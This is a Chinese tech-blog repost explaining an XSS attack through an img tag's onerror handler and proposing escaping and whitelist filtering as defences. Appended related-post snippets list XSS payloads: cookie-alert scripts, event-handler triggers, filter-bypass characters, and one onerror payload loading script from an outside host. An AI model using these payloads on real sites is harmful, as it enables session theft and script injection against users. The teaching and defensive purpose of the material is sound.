关于一次XSS攻击的onerror事件

最新推荐文章于 2023-03-01 18:13:27 发布
最新推荐文章于 2023-03-01 18:13:27 发布
阅读量3.5k 收藏 3
点赞数 1

直接在文本输入框添加

<img src="pic.gif" οnerrοr="javascript:this.src='/noPic.gif';" alt="pic" />

一些网站会对标签做出一些转义,导致转移之后的上述标签变为

<img src="pic.gif" οnerrοr="javascript:this.src='/noPic.gif';" alt="pic">

这样,注入的标签就失去了他的闭合性了,对一些普通的攻击就进行了防御,但是onerror事件是专门针对js出错的,所以,标签闭合性被破坏刚好触发了这个事件,所以,他会被执行,执行之后将img标签的src属性替换成我们想要的属性,然而我注入的这个地址,故意又是一个不能访问的地址,于是,就反复的触发这个onerror事件,最终导致浏览器堆栈溢出了。
说明:如果图片存在,但网络很不通畅,也可能触发 onerror。

解决方法:

1、用html转义,将<>转义成转义符,这样标签就编程了文本了(QQ空间的做法)

2、使用jsoup白名单过滤掉onerror关键字,让他不要在前台显示(这种更安全,因为转义还有可能被绕过)

转载地址:https://blog.csdn.net/tanzhen1991910/article/details/53085274

a545132569
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
XSS 跨站脚本漏洞总结(知识点+实例)
叶子的Blog
10-24 1894
XSS 简介 XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据攻击代码的工作方式,XSS可以分为反射型的XSS、存储型的XSS和DOM型的XSS。 反射型 反射型的XSS是非持久化的,攻击者事先制作好攻击链接,需要
XSS打靶日志
Aquarius_ego的博客
03-09 3699
XSS挑战,一起试试吧!
网络安全(2) -- 关于一次XSS攻击-图片(img标签)的onerror事件
热门推荐
TaneRoom的博客
11-08 2万+
一次XSS实战攻击
XSS漏洞详解以及绕过方式。
m0_63028223的博客
05-14 1502
下列以dvwa靶场为例: 反射性XSS: LOW级别 <script>alert('test')</script> 最基本的原理,就是前端对输入的内容过滤不严谨,是的输入的元素再html框架中得以运行。 medium级别 可能过滤了js标签,我们使用input标签, <input onblur=alert`1`>当input失去焦点时会触发 <input onclick=alert `123'> 当input获取焦点(点击输入)时触发
前端常见安全漏洞
whaleluo的博客
05-11 1887
文章目录xss跨站脚本攻击csrf->xsrf跨站请求伪造攻击SSRF服务端请求构造点击劫持sql注入 xss跨站脚本攻击 以"文章发布系统"为例 input输入框输入字符串后使用v-html渲染成HTML显示在当前页面 当input输入script(sc里面的js不会执行) <script>alert(document.cookie)</script> 当input输入img标签的onerror回调(弹出cookie) <img src="test" on
XSS讲解下(web安全入门11)
黑战士的博客
05-15 1698
一、XSS 的构造 1.1 利用[<>]构造 HTML/JS 可以利用[<>]构造 HTML 标签和] 1.2 伪协议 亦可以使用 JavaScript:伪协议的方式构造 XSS 在 IE 浏览器的地址栏中输入[javascript:alert(/XSS/);],弹框成功 提交参数[click me!] 点击超链接。即可触发 XSS 也可使用 img 标签的伪协议,但这种方法只在 IE6 下测试成功 [<img src="javascript:alert(/XSS/)">
详解 XSS 攻击
我是张跑跑
03-08 1392
文章目录XSS 攻击1. 前言2. 反射型(url)3. 存储型(表单)4. DOM型(onerror)5. 防御方案 XSS 攻击 1. 前言 XSS (Corss Site Scripting)也即跨站脚本攻击,攻击出现的原因一般是因为 Web 程序对用于的输入过滤不足导致的一种漏洞,攻击者可以把恶意的脚本代码注入到网页之中,当其他用户浏览时就会执行其中的恶意代码,对受害者产生各种攻击。XSS 一般分为三种类型: 反射型,存储型,DOM型 2. 反射型(url) 反射型 XSS 攻击的恶意脚本并没有被存
一个不错的分类信息门户 -ASP源码.zip
01-19
8. **安全性和性能优化**:学习如何防止SQL注入、XSS攻击等,以及如何优化数据库查询和页面加载速度。 总之,这个分类信息门户的ASP源码提供了一个实践平台,可以帮助你深入理解和应用ASP技术,同时也是一个了解...
ASP二次美化过的留言版程序源码
12-09
7. **错误处理**:成熟的程序应该包含了错误处理机制,比如使用`On Error Resume Next`或自定义错误处理函数,以确保在遇到问题时能优雅地处理错误,提供友好的错误提示。 8. **安全性**:考虑到留言板可能面临的...
一个asp留言板 适合学ASP初学者参考
05-06
3. **分页显示**:为了提高用户体验,通常不会一次性显示所有留言,而是采用分页技术。在ASP中,这可以通过计算总页数、获取每页的留言记录、设置页码跳转链接等方法实现。 4. **自定义字体**:用户在留言时可以...
加载loader (How to Load External Images in Actionscript 3.0)
03-18
8. **安全提示**:加载外部内容时,要注意防止XSS(跨站脚本攻击)和CSRF(跨站请求伪造)等安全问题。确保只从可信来源加载内容,并对用户输入进行验证。 以上就是ActionScript 3.0中如何加载外部图片的基本步骤和...
webChat使用websocket实现网页多人聊天
07-03
3. 对用户输入进行验证和过滤,防止XSS攻击。 4. 使用心跳机制检测并断开无效连接。 七、多用户同步 在多人聊天场景下,服务器需要处理来自多个客户端的消息,并确保所有客户端都能实时接收到这些消息。这通常通过...
【自用】xsspayload
头发和技术只能选择一个
09-28 375
(1)普通的XSS JavaScript注入 (2)IMG标签XSS使用JavaScript命令 (3)IMG标签无分号无引号 (4)IMG标签大小写不敏感 (5)HTML编码(必须有分号) (6)修正缺陷IMG标签 <IMG “”">”> (7)formCharCode标签(计算器) (8)UTF-8的Unicode编码(计算器) <IMG SRC=jav…省略…S’)> (9)7位的UTF-8的Unicode编码是没有分号的(计算器) <IMG SRC
XSS常见的触发标签
LYJ20010728的博客
05-06 1万+
无过滤情况 <script> <scirpt>alert("xss");</script> <img> 图片加载错误时触发 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss')")> 鼠标指针移动到元素时触发 <img src=1 onmouseover="alert(1)"> 鼠标指针移出时触发 <img src=1 onm
图片引用功能导致的XSS漏洞
yggcwhat
09-29 2522
图片引用功能导致的XSS漏洞
XSS漏洞(一)
m0_61841735的博客
03-01 304
onerror事件xss,使用逗号隔开事件脚本,从而执行三个javascript脚本,进而执行xss
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5567
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
Xss里img标签的一些利用
weixin_34358365的博客
02-05 2157
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974"></img> “><img src=x onerror=”with(document)body.appendChild(createElemen...
udp分片报文pcap文件
最新发布
07-18
udp分片报文pcap文件:64kudp大包分成每片658字节总计100片
2011年微博遭受XSS攻击事件反思
06-01
2011年,新浪微博曾遭受了一次大规模的XSS攻击事件。这次事件暴露出了微博安全防范措施的不足,也引发了人们对于网络安全问题的深刻反思。 XSS攻击是通过在网页中注入恶意代码,使得攻击者可以获取用户的敏感信息、劫持用户登录状态等,从而对用户造成危害。这次事件的发生,说明微博在安全防范方面存在漏洞,攻击者利用这些漏洞轻易地进行了攻击。 这次事件对于微博来说是一次教训,也是一次机遇。微博加强了安全防范措施,提高了用户的安全性,同时也提高了用户对于微博的信任度。这次事件也让人们认识到了网络安全问题的重要性,加强了对于网络安全的关注和防范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值